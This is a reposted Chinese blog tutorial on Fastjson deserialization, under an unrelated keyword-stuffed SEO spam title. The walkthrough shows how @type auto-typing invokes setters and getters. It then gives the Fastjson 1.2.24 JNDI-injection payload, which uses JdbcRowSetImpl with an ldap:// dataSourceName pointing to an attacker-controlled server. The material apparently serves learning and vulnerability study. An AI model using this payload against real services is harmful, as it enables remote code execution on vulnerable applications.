您的位置:首页 > 娱乐 > 八卦 > 桔子seo工具_app界面设计规范_网络营销软文范例500_seo分析报告怎么写

桔子seo工具_app界面设计规范_网络营销软文范例500_seo分析报告怎么写

2025/1/5 7:05:04 来源:https://blog.csdn.net/weixin_60584088/article/details/144517376  浏览:    关键词:桔子seo工具_app界面设计规范_网络营销软文范例500_seo分析报告怎么写
桔子seo工具_app界面设计规范_网络营销软文范例500_seo分析报告怎么写

写一个demo

package cn.anger.fastjsontest.demos.web;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;public class FastjsonController {public static void main(String[] args) {//利用Fastjson去解析变量数据String str="{\"name\":\"anger\",\"age\":18}}";JSONObject data=JSON.parseObject(str);System.out.println(data);}
}
  • 先写一个demo,这里主要是利用Fastjson去解析变量数据

![](https://i-blog.csdnimg.cn/img_convert/fdb9c7286217109b4

这里将这个语句换成这个:

package cn.anger.fastjsontest.demos.web;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;public class FastjsonController {public static void main(String[] args) {//利用Fastjson去解析变量数据String str="{\"name\":\"anger\",\"age\":18}";
//        JSONObject data=JSON.parseObject(str);String userStr = "{\"@type\":\"cn.anger.fastjsontest.demos.web.User\",\"age\":22,\"name\":\"anger\"}";JSONObject data=JSON.parseObject(userStr);System.out.println(data);}
}

在这里插入图片描述

这里输出结果就是anger和22

但是前面的内容没有了

这里我将这个user类中的默认set,getname类输出,接着在尝试打印结果

在这里插入图片描述

这时候就会出现这个打印的结果

所以这个时候将 userstr中的参数减少,那么执行的类的方法也会减少,只会直接执行其中的对应类

那么也就说明:传入其他类解析后默认执行set get类方法

接着使用Fastjson1.2.24这个版本的poc来进行分析:

还是先需要启动jndi注入命令:

在这里插入图片描述

然后需要再demo中修改代码:

package cn.anger.fastjsontest.demos.web;import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;public class FastjsonController {public static void main(String[] args) {//利用Fastjson去解析变量数据String str="{\"name\":\"anger\",\"age\":18}";
//        JSONObject data=JSON.parseObject(str);String userStr = "{\"@type\":\"cn.anger.fastjsontest.demos.web.User\",\"age\":22}";//恶意pocString Pocstr = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://x.x.x.x:1389/m6pqb\", \"autoCommit\":true}\n";JSONObject data=JSON.parseObject(Pocstr);System.out.println(data);}
}

在这里插入图片描述

<

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com